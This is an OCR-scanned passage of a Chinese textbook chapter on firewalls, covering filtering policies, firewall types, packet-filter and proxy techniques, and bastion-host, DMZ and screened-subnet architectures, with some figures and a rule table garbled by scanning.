既然 防火 墙 的 基本 原理 就 是 分 辩 流 经 它 的 数据 哪些 是 可 以 通过 的 哪些 是 不 能 通过 的 ， 
那么 它 又 是 如 何 来 分 辩 的 呢 ? 这 要 靠 防火 墙 的 策略 来 实现 ,也 叫做 防火 墙 规则 集 。 也 就 是 
在 防火 墙 的 规则 库 里 面 预 设 好 ,哪些 数据 可 以 通过 ,哪些 是 要 截流 的 。 就 好 比 一 个 门 房 , 事 
先 就 写 好 了 门 房 守 则 ,哪些 人 可 以 放 进去 ,哪些 人 是 要 拒 之 门 外 的 。 

防火 墙 的 策略 分 成 两 类 ,一 类 是 一 切 未 被 禁止 的 就 是 允许 的 , 另 一 类 是 一 切 未 被 允许 的 
就 是 禁止 的 。 

1) 一 切 未 被 禁止 的 就 是 允许 的 (Yes 规则 ) 

管理 员 必须 针对 每 一 种 新 出 现 的 攻击 ,制定 新 的 规则 。 需 要 确定 那些 被 认为 是 不 安全 
的 服务 ,禁止 其 访问 ; 而 其 他 服务 则 被 认为 是 安全 的 ,允许 访问 。 这 种 方法 构成 了 一 种 更 为 
灵活 的 应 用 环境 ,可 以 为 用 户 提 供 更 多 的 服务 ,其 缺点 在 于 很 难 提供 可 靠 的 安全 防护 。 

2) 一 切 未 被 允许 的 就 是 禁止 的 (No 规则 ) 

这 种 规则 比较 保守 ,需要 确定 所 有 可 以 被 提供 的 服务 以 及 它们 的 安全 性 ,然后 开放 这 些 
服务 ,并 将 所 有 其 他 未 被 列 人 的 服务 排除 在 外 ,禁止 访问 。 优 点 是 可 以 造成 一 种 十 分 安全 的 
环境 ,其 缺点 在 于 用 户 所 能 使 用 的 服务 范围 受到 很 大 限制 。 

具体 选择 哪 种 规则 要 根据 实际 情况 决定 ,如 果 出 于 安全 考虑 就 选择 No 规则 ,如 果 出 于 
应 用 的 便捷 性 考虑 就 选择 Yes 规则 。 


11.2 防火 墙 的 分 类 


防火 墙 的 产生 和 发 展 已 经 历 了 相当 一 段 时 间 , 根 据 不 同 的 标准 ,其 分 类 方法 也 各 不 
相同 。 
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1. 根据 防火 墙 形式 分 类 


如 果 从 防火 墙 的 软 、 硬 件 形式 来 分 的 话 , 防 火 墙 可 以 分 为 软件 防火 墙 和 硬件 防火 墙 以 及 
芯片 级 防火 墙 。 

1) 软件 防火 墙 

运行 于 特定 的 计算 机 上 , 它 需 要 客户 预先 安装 好 的 计算 机 操作 系统 的 支持 ,一般 来 说 这 
台 计 算 机 就 是 整个 网 络 的 网 关 。 就 像 其 他 的 软件 产品 一 样 需要 先 在 计算 机 上 安装 并 做 好 配 
置 才 可 以 使 用 。 防 火 墙 厂商 中 做 网 络 版 软件 防火 墙 最 出 名 的 莫 过 于 Checkpoint。 使 用 这 类 
防火 墙 ,需要 网 管 对 所 工作 的 操作 系统 平台 比较 熟悉 。 

2) 硬件 防火 墙 

这 里 说 的 硬件 防火 墙 是 指 “ 所 谓 的 硬件 防火 墙 "。 之 所 以 加 上 “所 谓 ” 二 字 , 是 针对 芯片 
级 防火 墙 说 的 。 它 们 最 大 的 差别 在 于 是 否 基 于 专用 的 硬件 平台 。 目 前 市 场 上 大 多 数 防火 墙 
都 是 这 种 所 谓 的 硬件 防火 墙 ,都 基于 PC 架构 ,就 是 说 ,它们 和 普通 的 家 庭 用 的 PC 没有 太 大 
区 别 。 在 这 些 PC 架构 计算 机 上 运行 一 些 经 过 裁剪 和 简化 的 操作 系统 ,最 常用 的 有 UNIX、 
Linux 和 FreeBSD 系统 。 值 得 注意 的 是 ,由 于 此 类 防火 墙 采用 的 依然 是 别人 的 内 核 ,因此 依 
然 会 受到 操作 系统 本 身 的 安全 性 影响 。 

传统 硬件 防火 墙 一 般 至 少 应 具备 三 个 端口 ,分 别 接 内 网 、 外 网 和 DMZ 区 ( 非 军事 化 
区 ) ,现在 一 些 新 的 硬件 防火 墙 往 往 扩 展 了 端口 ,常见 四 端口 防火 墙 一 般 将 第 四 个 端口 作为 
配置 口 ,管理 端口 。 很 多 防火 墙 还 可 以 进一步 扩展 端口 数目 。 

3) 芯片 级 防火 墙 

芯片 级 防火 墙 基于 专门 的 硬件 平台 。 专 有 的 ASIC 芯片 促使 它们 比 其 他 种 类 的 防火 墙 
速度 更 快 ,处 理 能 力 更 强 , 性 能 更 高 。 做 这 类 防火 墙 最 出 名 的 厂商 有 NetScreen、FortiNet、 
Cisco 等 。 这 类 防火 墙 由 于 是 专用 OS( 操 作 系统 ), 因 此 防火 墙 本 身 的 漏洞 比较 少 ,不 过 价 
格 相 对 比较 高 昂 。 


2. 根据 实现 原理 分 类 


根据 其 实现 原理 可 分 为 “ 包 过 滤 型 ”和 “应 用 代理 型 ?两 大 类 。 前 者 以 以 色 列 的 
Checkpoint 防火 墙 和 美国 Cisco 公司 的 PIX 防火 墙 为 代表 ,后 者 以 美国 NAI 公司 的 
Gauntlet 防火 墙 为 代表 。 

1) 包 过 滤 (Packet Filtering) 型 

包 过 滤 型 防火 墙 工 作 在 OSI 网 络 参考 模型 的 网 络 层 和 传输 层 , 它 根据 数据 包头 源 地 
址 \ 目 的 地 址 、 端 口号 和 协议 类 型 等 标志 确定 是 否 允许 通过 。 只 有 满足 过 滤 条 件 的 数据 包 才 
被 转发 到 相应 的 目的 地 ,其 余数 据 包 则 被 从 数据 流 中 丢弃 。 

包 过 滤 方 式 是 一 种 通用 、 廉 价 和 有 效 的 安全 手段 。 通 用 是 因为 它 不 是 针对 各 个 具体 的 
网 络 服务 采取 特殊 的 处 理 方式 ,适用 于 所 有 网 络 服务 ; 廉价 则 是 因为 大 多 数 路 由 器 都 提供 
数据 包 过 滤 功 能 ,所 以 这 类 防火 墙 多 数 是 由 路 由 器 集成 的 ; 而 有 效 是 因为 它 能 很 大 程度 上 
满足 了 绝 大 多 数 企 业 安全 要 求 。 

在 整个 防火 墙 技术 的 发 展 过 程 中 , 包 过 滤 技 术 出 现 了 两 种 不 同 版 本 , 称 为 “静态 包 过 滤 ” 
和 ”动态 包 过 滤 ”。 这 部 分 将 在 下 一 节 详 细 讲述 。 
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2) 应 用 代理 (Application Proxy) 型 

这 种 防火 墙 工作 在 OSI 的 最 高 层 , 即 应 用 层 。 其 特点 是 完全 “阻隔 ”了 网 络 通信 流 , 通 
过 对 每 种 应 用 服务 编制 专门 的 代理 程序 ,实现 监视 和 控制 应 用 层 通 信 流 的 作用 。 

在 代理 型 防火 墙 技术 的 发 展 过程 中 , 它 也 经 历 了 两 个 不 同 的 版 本 , 即 应 用 网 关 型 代理 防 
火 墙 和 电路 级 网 关 防 火 墙 。 


3. 根据 防火 墙 结构 分 类 


从 防火 墙 结构 上 分 ,防火 墙 主要 有 单一 主机 防火 墙 、. 路 由 器 集成 式 防火 墙 和 分 布 式 防火 
墙 三 种 。 

1) 单一 主机 防火 墙 

这 种 是 最 为 传统 的 防火 墙 ,独立 于 其 他 网 络 设备 ,位 于 网 络 边界 。 这 种 防火 墙 其 实 与 一 
台 计 算 机 结构 差不多 ,同样 包括 CPU 内存 、 硬 盘 等 基本 组 件 , 且 主板 上 也 有 南 ,北桥 芯片 。 

它 与 一 般 计 算 机 最 主要 的 区 别 是 防火 墙 一 般 都 集成 了 两 个 以 上 的 以 太 网 卡 , 因 为 它 需 
要 连接 一 个 以 上 的 内 、 外 部 网 络 。 其 中 的 硬盘 就 是 用 来 存储 防火 墙 所 用 的 基本 程序 ,如 包 过 
滤 程 序 和 代理 服务 器 程序 等 ,有 的 防火 墙 还 把 日 志 记 录 也 记录 在 此 硬盘 上 。 

虽然 如 此 ,但 我 们 不 能 说 它 就 与 我 们 平常 的 PC 一 样 ,因为 它 的 工作 性 质 ,决定 了 它 要 
具备 非常 高 的 稳定 性 ,实用 性 ,具备 非常 高 的 系统 吞吐 性 能 。 因 此 ,看 似 与 PC 差不多 的 配 
置 ,价格 却 昂贵 得 多 。 

2) 路 由 器 集成 式 防火 墙 

原来 单一 主机 的 防火 墙 由 于 价格 非常 昂贵 , 仅 有 少数 大 型 企业 才能 承受 得 起 ,为 了 降低 
企业 网 络 投资 ,现在 许多 中 ,高 档 路 由 器 中 集成 了 防火 墙 功能 。 如 Cisco IOS 防火 墙 系列 。 
但 这 种 防火 墙 通常 是 较 低 级 的 包 过 滤 型 。 这 样 企业 就 不 用 再 同时 购买 路 由 器 和 防火 墙 , 大 
大 降低 了 网 络 设备 购买 成 本 。 

3) 分 布 式 防 火 墙 

随 着 防火 墙 技 术 的 发 展 及 应 用 需求 的 提高 ,原来 作为 单一 主机 的 防火 墙 现在 已 发 生 了 
许多 变化 。 最 明显 的 变化 就 是 现在 许多 中 ,高 档 的 路 由 器 中 已 集成 了 防火 墙 功能 ,还 有 的 防 
火 墙 已 不 再 是 一 个 独立 的 硬件 实体 ,而 是 由 多 个 软 、 硬 件 组 成 的 系统 ,这 种 防火 墙 ,俗称 “分 
布 式 防火 墙 ”。 

分 布 式 防 火 墙 再 也 不 是 只 是 位 于 网 络 边 界 ,而 是 渗透 于 网 络 的 每 一 台 主 机 ,对 整个 内 部 
网 络 的 主机 实施 保护 。 在 网 络 服务 器 中 ,通常 会 安装 一 个 用 于 防火 墙 系 统管 理 软 件 , 在 服务 
器 及 各 主机 上 安装 有 集成 网 卡 功能 的 PCI 防火 墙 卡 ,一 块 防火 墙 卡 同时 兼 有 了 网卡 和 防火 墙 
的 双重 功能 。 这 样 一 个 防火 墙 系统 就 可 以 彻底 保护 内 部 网 络 。 各 主机 把 任何 其 他 主机 发 送 
的 通信 连接 都 视 为 “不 可 信 ? 的 ,都 需要 严格 过 滤 。 而 不 是 传统 边界 防火 墙 那样 , 仅 对 外 部 网 
络 发 出 的 通信 请 求 “ 不 信任 ”。 


4. 按照 防火 墙 应 用 部 署 分 类 


按 防火 墙 的 应 用 部 署 位 置 ,可 以 分 为 边界 防火 墙 \ 个 人 防火 墙 和 混合 防火 墙 三 大 类 。 
1) 边界 防火 墙 
位 于 内 、 外 部 网 络 的 边界 ,所 起 的 作用 的 对 内 、 外 部 网 络 实施 隔离 ,保护 边界 内 部 网 络 。 
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这 类 防火 墙 一 般 都 是 硬件 类 型 的 ,价格 较 贵 ,性 能 较 好 。 

2) 个 人 防火 墙 

安装 于 单 台 主机 中 ,防护 的 也 只 是 单 台 主机 。 这 类 防火 墙 应 用 于 广大 的 个 人 用 户 ,通常 
为 软件 防火 墙 , 价 格 最 便宜 ,在 功能 上 有 很 大 的 限制 。 

3) 混合 式 防 火 墙 

是 一 整套 防火 墙 系统 ,由 若干 个 软 、 硬 件 组 件 组 成 ,分 布 于 内 、 外 部 网 络 边界 和 内 部 各 主 
机 之 间 , 既 对 内 、 外 部 网 络 之 间 通 信 进 行 过 滤 , 又 对 网 络 内 部 各 主机 间 的 通信 进行 过 滤 。 它 
属于 最 新 的 防火 墙 技术 之 一 ,性 能 最 好 ,价格 也 最 贵 。 


11.3 ”防火墙 技术 
防火 墙 的 具体 实现 采用 了 两 种 基本 技术 , 即 数据 包 过 滤 和 代理 服务 。 
1. 数据 包 过 滤 技术 
1) 数据 包 过 滤 原 理 


数据 包 过 滤 是 在 网 络 的 适当 位 置 ,根据 系统 设置 的 过 滤 规 则 。 对 数据 包 实施 过 滤 , 只 多 
许 满足 过 滤 规 则 的 数据 包 通 过 并 被 转发 到 目的 地 ,而 其 他 不 满足 规则 的 数据 包 被 丢弃 。 当 
前 大 多 数 的 网 络 路 由 器 都 具备 一 定 的 数据 包 过 滤 能 力 。 

数据 包 过 滤器 通过 检查 数据 包 的 报头 信息 ,根据 数据 包 的 源 地 址 、 目 的 地 址 和 以 上 其 他 
的 信息 组 合 , 按 照 过 滤 规 则 来 决定 是 否 允 许 数 据 包 通 过 。 数 据 包 过 滤器 在 接收 数据 包 时 一 
般 不 判断 数据 包 的 上 下 文 , 只 根据 当前 的 数据 包 内 容 做 决定 。 

Internet 上 的 服务 一 般 都 和 特定 的 端口 号 有 关 , 如 FTP 一 般 工 作 在 21 端口 ， 
TELENET 工作 在 23 端口 , Web 服务 在 80 端口 ,因此 可 通过 包 过 滤 来 禁止 某 项 服务 。 

2) 静态 包 过 滤 类 型 防火 墙 

采用 数据 包 过 滤 技 术 的 防火 墙 就 被 称 为 静态 包 过 滤 防 火 墙 。 这 类 防火 墙 几乎 是 与 路 由 
器 同时 产生 的 , 它 是 根据 定义 好 的 过 滤 规 则 审查 每 个 数据 包 , 以 便 确 定 其 是 否 与 某 一 条 包 过 
滤 规 则 匹配 。 过 滤 规则 基于 数据 包 的 报头 信息 来 制订 。 报 头 信息 中 如 前 所 示 包 括 IP 源 地 
址 ,IP 目标 地 址 ,传输 协议 (TCP、UDP、ICMP 等 )、TCP/UDP 目标 端口 .ICMP 消息 类 
型 等 。 

这 种 防火 墙 工作 在 TCP/IP 协议 的 网 络 层 和 传输 层 ,如 图 11-2 所 示 。 

TCP/IP 协 议 模型 
5. 应 用 层 
专 输 


Ln 


输入 数据 流 [ 


有 
3. 网络 导 输出 数据 流 
2. 数 据 链 路 屋 


1. 物理 层 


图 11-2 静态 包 过 滤 原 理 
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依据 系统 事先 设 定好 的 过 滤 规 则 ,过 滤器 检查 数据 流 中 每 个 数据 包 。 依 据 报 头 信息 的 
组 合 来 确定 是 否 允 许 该 数据 包 通 过 。 如 果 匹 配 到 一 条 规则 , 则 根据 此 规则 决定 转发 或 者 丢 
弃 , 如 果 所 有 规则 都 不 匹配 , 则 依据 缺 省 策略 。 
表 11-1 是 一 个 过 滤 规 则 的 举例 。 
表 11-1 包 过 滤 防 火 墙 规则 示例 
组 序号 动作 源 IP 目的 人 P 源 端 口 目的 端口 协议 类 型 


J 允许 10.%L1 x 关 关 TCP 
2 允许 x 10.1.1.1 20 x TCP 
3 禁止 关 0 20 <1024 TCP 


第 一 条 规则 : 内 部 主机 10. 1. 1.1 的 任何 端口 访问 任何 主机 的 任何 端口 ,基于 TCP 协 
议 的 数据 包 都 允许 通过 。 

第 二 条 规则 : 任何 主机 的 20 端口 访问 主机 10.1.1.1 的 任何 端口 ,基于 TCP 协议 的 数 
据 包 人 允许 通过 。 

第 三 条 规则 : 任何 主机 的 20 端口 访问 主机 10. 1. 1. 1 小 于 1024 的 端口 ,如 果 基 于 TCP 
协议 的 数据 包 都 禁止 通过 (与 1.2 作为 系列 规则 时 该 规则 无 效 ) 。 

静态 包 过 滤 防 火 墙 的 优点 是 逻辑 简单 ,对 网 络 性 能 的 影响 较 小 ,有 较 强 的 透明 性 。 
此 外 , 它 的 工作 和 应 用 层 无 关 , 无 须 改 动 任何 客户 机 和 主机 上 的 应 用 程序 ,易于 安装 和 
使 用 


但 是 ,在 配置 基于 包 过 滤 方式 的 防火 墙 时 ,需要 对 IPTCP.UDP ICMP 等 各 种 协议 有 
深入 的 了 解 , 否 则 容易 出 现 因 配置 不 当 带 来 问题 ; 数据 包 的 地 址 及 端口 号 都 在 数据 包 的 头 
部 ,不 能 彻底 防止 地 址 欺骗 ; 过 滤 依 据 只 有 网 络 层 和 传输 层 的 有 限 信 息 ,各 种 安全 要 求 不 能 
充分 满足 ; 允许 外 部 客户 和 内 部 主机 的 直接 连接 ,可 能 会 造成 一 些 安全 问题 ; 不 提供 用 户 
的 认证 机 制 。 

3) 状态 监测 防火 墙 

静态 包 过滤 最 明显 的 缺陷 是 ,为 了 实现 期 望 的 通信 , 它 必须 保持 一 些 端口 永久 开放 ,这 
就 为 潜在 的 攻击 提供 了 机 会 。 为 了 克服 这 个 弱点 ,发 展 出 了 动态 包 过 滤 技 术 , 它 根据 数据 包 
的 头 信息 打开 或 关闭 端口 。 当 一 组 数据 包 通 过 打开 的 端口 到 达 目 的 地 ,防火 墙 就 关闭 这 些 
端口 。 这 样 采用 动态 设置 包 过 滤 规 则 的 方法 ,避免 了 静态 包 过 滤 所 具有 的 问题 。 这 种 技术 
后 来 发 展 成 为 包 状 态 监 测 (Stateful Inspection) 技 术 。 采 用 这 种 技术 的 防火 墙 对 通过 其 建 
立 的 每 一 个 连接 都 进行 跟踪 (如 图 11-3 所 示 ) ,并且 根据 需要 可 动态 地 在 过 滤 规 则 中 增加 或 
更 新 条 目 。 采 用 这 种 动态 包 过 滤 方 法 的 防火 墙 称 为 状态 监测 防火 墙 。 

这 类 防火 墙 的 优点 是 减少 了 端口 的 开放 时 间 ,提供 了 对 几乎 所 有 服务 的 支持 ,缺点 是 它 
也 允许 了 外 部 客户 和 内 部 主机 的 直接 连接 ,不 提供 对 用 户 的 认证 。 

4) 包 过 滤 防 火 墙 的 优 缺 点 

一 般 来 说 , 包 过 滤 类 型 的 防火 墙 具 有 以 下 优点 。 

(1) 性 能 优 于 其 他 防火 墙 ,因为 它 执行 的 计算 较 少 ,并 且 容 易 用 硬件 方式 实现 。 

(2) 规则 设置 简单 ,通过 禁止 内 部 计算 机 和 特定 Internet 资源 连接 ,单一 规则 即 可 保护 
整个 网 络 。 
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(3) 不 需要 对 客户 端 计算 机 进行 专门 配置 。 

(4) 通过 NAT( 网 络 地 址 转换 ) ,可 以 对 外 部 用 户 屏蔽 内 部 IP。 

而 其 缺点 也 很 明显 。 

(1) 无 法 识别 协议 层次 ,也 无 法 对 协议 子 集 进行 约束 ,其 至 对 最 基本 的 服务 ,如 ftp 中 的 
put 和 get 命令 也 无 法 识别 。 

(2) 处 理 包 内 信息 的 能 力 有 限 , 通 常 不 能 提供 其 他 附加 服务 。 

(3) 一 般 无 法 约束 由 内 部 主机 到 防火 墙 服务 器 上 的 信息 ,只 能 控制 哪些 信息 可 以 通过 ， 
从 而 入 侵 者 可 能 访问 到 防火 墙 主 机 的 服务 , 带 来 安全 隐患 。 

(4) 由 于 对 众多 网 络 服务 的 支持 所 造成 的 复杂 性 ,很 难 对 规则 有 效 性 进行 测试 。 


2. 代理 服务 技术 


1) 代理 服务 原理 

代理 服务 是 在 防火 墙 主机 上 和 运行 的 专门 的 应 用 程序 或 服务 器 程序 ,这 些 程序 根据 安全 
策略 处 理 用 户 对 网 络 服务 的 请 求 , 代 理 服务 位 于 内 部 网 和 外 部 网 之 间 ,处 理 其 间 的 通信 以 代 
替 互相 的 直接 通信 。 

代理 服务 具有 两 个 部 件 : 一 个 是 服务 器 代理 ,一 个 是 客户 端 代 理 ( 如 图 11-4 所 示 )。 服 
务 器 代理 是 指 代表 客户 处 理 与 服务 器 连接 请 求 的 程序 。 当 服务 器 端 代理 得 到 一 个 客户 的 连 
接 请 求 时 , 它 将 核实 客户 请 求 , 并 经 过 特定 的 安全 化 的 代理 应 用 程序 处 理 连 接 请 求 , 将 处 理 
后 的 请 求 传递 到 服务 器 上 ,然后 接收 服务 器 的 应 答 ,并 做 进一步 处 理 , 最 后 将 答复 交 给 发 出 
请 求 的 最 终 客 户 。 


[客户 机 


客户 端 代理 | | 服务 器 并 代理 


服务 器 


代理 防火 墙 


图 11-4 代理 防火 墙 的 结构 


代理 服务 器 在 外 部 网 络 向 内 部 网 络 申请 服务 时 发 挥 了 中 间 转 接 的 作用 。 服 务 器 端 代理 
可 以 是 一 个 运行 代理 服务 器 程序 的 网 络 主机 ,客户 端 代理 可 以 是 经 过 配置 的 普通 客户 程序 。 
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例如 FTP、Telnet 等 。 客 户 和 客户 端 代理 通信 ,服务 器 和 服务 器 端 代理 通信 ,这 两 个 代理 之 
间 互 相 直 接 通信 ,代理 服务 器 检查 来 自 客户 端 代 理 的 请 求 , 根 据 安全 策略 认可 或 否认 这 个 
请 求 。 

2) 应 用 网 关 (Application Gateway) 型 防火 墙 

应 用 网 关 防 火 墙 通常 也 称 为 应 用 代理 服务 器 ,通常 说 的 代理 防火 墙 就 是 这 一 种 。 其 工 
作 原 理 如 图 11-5 所 示 。 


TCP/IP 协 议 模型 


SR [FRR | Te | EAI | 


| 4.TCP 层 


| 3.IP 层 


2. 数据 链 路 层 


1. 物理 层 


输入 数据 流 输出 数据 流 
图 11-5 应 用 网 关 防 火 墙 工作 示意 


这 种 防火 墙 通过 代理 技术 参加 了 TCP 连接 的 全 过 程 。 从 内 部 发 出 的 数据 包 经 过 防火 
墙 处 理 , 就 好 像 源 于 防火 墙 的 外 部 网 卡 , 从 而 可 以 达到 隐藏 内 部 网 结构 的 作用 。 

它 一 般 被 配置 为 双 宿 主 网 关 , 具 有 两 个 网 络 接口 卡 , 跨 接 内 部 网 和 外 部 网 。 网 关 可 以 与 
两 个 网 络 通信 ,因此 是 安装 代理 的 理想 位 置 。 

各 个 应 用 代理 在 用 户 和 服务 之 间 处 理 所 有 的 通信 ,能 够 对 通过 它 的 数据 进行 详细 的 审 
计 追 踪 。 

代理 类 型 防火 墙 最 突出 的 优点 就 是 安全 性 高 ,由 于 每 一 个 内 、 外 网 络 之 间 的 连接 都 要 通 
过 代理 服务 器 的 介入 和 转换 ,通过 专门 为 特定 的 服务 如 Http 编写 的 安全 应 用 程序 进行 处 
理 , 然 后 由 防火 墙 本 身 提 交 请 求 和 应 答 ,没有 给 内 外 网 的 计算 机 以 任何 直接 会 话 的 机 会 ,从 
而 避免 了 入 侵 者 数据 驱动 类 型 的 攻击 方式 人 侵 内 部 网 。 包 过 滤 类 型 的 防火 墙 是 很 难 彻 底 避 
免 这 一 类 攻击 的 。 

代理 防火 墙 最 大 的 缺点 就 是 速度 相对 比较 慢 , 当 用 户 对 网 关 的 吞吐 量 要 求 比较 高 时 , 代 
理 防 火 墙 就 会 成 为 内 外 网 络 之 间 的 瓶颈 。 在 现实 环境 中 ,大 部 分 高 速 网 例如 ATM 或 千 兆 
位 以 太 网 之 间 的 防火 墙 要 考虑 使 用 包 过 滤 类 型 来 满足 速度 要 求 。 

3) 电路 级 网 关 防火 墙 

电路 级 网 关 是 一 个 通用 代理 服务 器 ,通常 可 以 认为 它 工 作 于 OSI 互联 模型 的 会 话 层 或 
是 TCP/IP 协议 的 TCP 层 ,如 图 11-6 所 示 。 

它 适 用 于 多 个 协议 ,但 它 不 需要 识别 在 同一 个 协议 栈 运 行 的 不 同 应 用 ,当然 也 不 需要 对 
不 同 的 应 用 设置 不 同 的 代理 模块 ,但 这 种 代理 需要 对 客户 端 做 适当 修改 。 

它 接受 客户 端的 连接 请 求 ,代理 客户 端 完 成 网 络 连 接 , 建 立 起 一 个 回路 ,对 数据 包 起 转 
发 作用 ,数据 包 被 提交 给 用 户 的 应 用 层 来 处 理 。 
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图 11-6 ”电路 级 网 关 防 火 墙 工作 示意 


电路 级 网 关 比 较 通 用 ,不 需要 对 不 同 的 应 用 设置 不 同 的 代理 模块 ,但 同样 具有 占用 资源 
大 ,速度 慢 的 缺点 。 同 数据 包 过 滤 技 术 相 比 , 其 优点 是 可 以 在 转发 数据 包 之 前 完成 身份 认证 
的 工作 ,但 同样 ,由 于 它 也 不 分 析 上 下 文 , 包 过 滤 技 术 中 与 此 相关 的 缺点 它 也 具有 。 

电路 级 网 关 的 实现 典型 是 Socks5 协议 ,支持 多 种 认证 方式 。 


11.4 防火 墙 的 体系 结构 


介绍 体系 结构 之 前 , 先 介绍 两 个 概念 ,一 个 是 堡垒 主机 (Bastion Host) 的 概念 ,堡垒 主 
机 是 物理 内 部 网 中 唯一 可 供 外 界 访问 到 的 主机 , 它 通常 配置 了 严格 的 安全 防范 措施 , 堡 从 主 
机 为 内 部 网 和 外 部 网 之 间 的 通信 提供 一 个 阻塞 点 ,如 果 没 有 堡垒 主机 ,网 络 之 间 将 不 能 互相 
访问 。 

另外 一 个 概念 是 非 军事 区 (DeMilitarized Zone,DMZ) , 指 供 外 部 网 访问 的 专门 区 域 ,用 
于 发 布 信息 ,提供 服务 。 通 常情 况 下 ,外 部 网 和 内 部 网 都 可 以 访问 这 一 区 域 。 

对 于 防火 墙 而 言 , 它 应 承担 保护 内 部 网 及 DMZ 的 使 命 。 

(1) 要 允许 内 部 网 能 按照 规则 限制 访问 Internet 及 DMZ。 

(2) 向 外 界 提供 DMZ 的 公开 服务 ,如 Web 访问 .FTP 等 。 

(3) 必须 阻止 外 界 访问 内 部 网 及 防火 墙 自身 。 

(4) 出 于 安全 考虑 ,不 应 允许 DMZ 访问 内 部 网 。 

目前 ,防火 墙 的 体系 结构 一 般 有 双重 宿主 主机 体系 结构 .屏蔽 主机 体系 结构 和 屏蔽 子 网 
体系 结构 。 


1. 双重 宿主 主机 体系 结构 


双重 宿主 主机 体系 结构 是 围绕 具有 双重 宿主 的 主机 而 构筑 的 ,该 主机 至 少 有 两 个 网 络 
接口 。 这 样 的 主机 可 以 充当 与 这 些 接口 相连 的 网 络 之 间 的 路 由 器 , 它 能 够 从 一 个 网 络 向 另 
一 个 网 络 发 送 IP 数据 包 。IP 数据 包 从 一 个 网 络 ( 例 如 Internet) 并 不 是 直接 发 送 到 其 他 网 
络 ( 例 如 内 部 的 、 被 保护 的 网 络 ), 即 内 部 网 络 和 内 部 网 络 不 能 直接 通信 ,而 是 由 双重 宿主 主 
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机 在 中 间 实 现 交接 过 滤 。 
双重 宿主 主机 的 防火 墙 体系 结构 是 相当 简单 的 : 双重 宿主 主机 位 于 内 部 网 络 和 外 部 网 
络 之 间 ,并且 与 二 者 相连 (如 图 11-7 所 示 ) 。 
双重 宿主 主机 


通过 主机 通信 通过 主机 通信 


应 用 代理 服务 


Ce 3 禁止 直接 通信 Cr 3 


图 11-7 双重 宿主 主机 体系 结构 


2. 屏 项 主机 体系 结构 


屏蔽 主机 体系 结构 防火 墙 使 用 一 个 路 由 器 把 内 部 网 络 和 外 部 网 络 隔离 开 , 堡 又 主机 是 
Internet 上 的 主机 能 连接 到 的 唯一 的 内 部 网 络 上 的 系统 (如 图 11-8 所 示 )。 任 何 外 部 的 系统 
要 访问 内 部 的 系统 或 服务 都 必须 先 连接 到 这 台 主 机 。 同 样 内 部 网 也 只 有 堡垒 主机 可 以 连接 
Internet, 堡 又 主机 实际 也 就 是 代理 服务 器 。 


Te 
C3 人 


包 过 滤 路 由 器 
需 通过 堡垒 主 机 才能 和 内 部 网 络 相连 


保全 主机 
图 11-8 屏蔽 主机 体系 结构 


这 种 体系 结构 安全 性 较 高 ,提供 了 双重 保护 ,实现 了 网 络 层 安全 ( 包 过 滤 ) 和 应 用 层 安 全 
(可 防止 某 些 木马 外 连 ) ,但 在 这 一 方式 下 ,路 由 器 是 否 配置 正确 是 这 种 防火 墙 安全 与 和 否 的 关 
键 , 如 果 路 由 表 被 破坏 ,堡垒 主机 可 能 被 绕 过 ,使 内 部 网 络 完全 暴露 。 


3. 屏蔽 子 网 体系 结构 


屏蔽 子 网 体系 结构 的 最 简单 的 形式 为 ,两 个 屏蔽 路 由 器 ,每 一 个 都 连接 到 一 个 处 于 内 网 
和 外 网 之 间 的 所 谓 周边 网 ,也 就 是 非 军事 区 DMZ。 一 个 位 于 周边 网 与 内 部 网 络 之 间 , 另 一 
个 位 于 周边 网 与 外 部 网 络 (通常 为 Internet) 之 间 。 这 样 就 在 内 部 网 络 与 外 部 网 络 之 间 形 成 
了 一 个 “隔离 带 ”。 堡 又 主机 安装 在 这 个 “隔离 带 " 中 (如 图 11-9 所 示 )。 为 了 侵入 用 这 种 体 
系 结构 构筑 的 内 部 网 络 , 侵 袭 者 必须 通过 两 个 路 由 器 。 即 使 侵袭 者 侵入 堡 侄 主机 ,仍然 必须 
通过 内 部 路 由 器 访问 内 部 网 络 。 
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11-9 屏蔽 子 网 体系 结构 


在 这 种 体系 结构 中 ,堡垒 主机 是 接受 来 自 外 界 连接 的 主要 入 口 。 内 部 路 由 器 对 内 部 网 
络 与 堡垒 主机 之 间 的 通信 进行 过 滤 , 外 部 路 由 器 对 外 部 网 络 到 周边 网 的 访问 进行 过 滤 。 

以 上 介绍 了 三 种 基本 的 防火 墙 体系 结构 ,但 在 建造 防火 墙 时 ,一 般 很 少 采 用 单一 的 结 
构 ,通常 是 多 种 解决 不 同 问题 的 技术 组 合 。 这 种 组 合 主要 取决 于 安全 中 心 向 用 户 提供 什么 
样 的 服务 ,以 及 安全 中 心 能 接受 什么 等 级 风险 。 采 用 怎样 的 组 合 主要 取决 于 经 费 、 投 资 的 大 
小 和 技术 人 员 的 技术 ,时 间 等 因素 ,通常 有 使 用 多 堡垒 主机 、 合 并 内 部 路 由 器 与 外 部 路 由 器 、 
合并 堡垒 主机 与 外 部 路 由 器 、 合 并 堡垒 主机 与 内 部 路 由 器 、 使 用 多 台 内 部 路 由 器 或 外 部 路 由 
器 、 使 用 多 个 周边 网 络 .使 用 双重 宿主 主机 与 屏蔽 子 网 等 多 种 组 合 形式 。 


115 防火 墙 的 局 限 性 


防火 墙 虽然 能 对 不 同安 全 等 级 的 系统 之 间 的 通信 进行 有 效 地 过 滤 和 限制 ,保护 处 于 它 
身后 的 网 络 不 受 外 界 的 侵袭 和 干扰 。 但 随 着 网 络 技术 的 发 展 ,网 络 结构 日 趋 复杂 ,防火 墙 在 
使 用 过 程 中 暴露 出 许多 功能 上 的 局 限 性 ,需要 其 他 安全 技术 来 弥补 。 

总 的 来 说 ,防火 墙 的 局 限 性 主要 体现 在 如 下 几 个 方面 。 

(1) 防火 墙 无 法 防范 来 自 网 络 内 部 的 攻击 ,而 通过 调查 发 现 , 有 一 半 以 上 的 攻击 都 来 自 
网 络 内 部 ,对 于 那些 心怀 不 满 而 要 破坏 内 部 网 络 的 内 部 员工 来 说 ,防火 墙 形同虚设 。 

(2) 防火 墙 无 法 对 绕 过 它 的 通信 进行 限制 。 例 如 入 侵 者 可 以 伪造 数据 绕 过 防火 墙 或 者 
找到 防火 墙 中 可 能 开启 的 后 门 ; 另外 ,如 果 站 点 允许 对 防火 墙 后 面 的 内 部 系统 进行 拨号 访 
问 ,那么 防火 墙 没有 办 法 阻止 人 侵 者 进行 拨号 入侵 。 

(3) 防火 墙 不 能 堵 住 来 自 外 部 网 络 的 病毒 。 归根结底 ,防火墙 只 是 一 种 访问 控制 技术 ， 
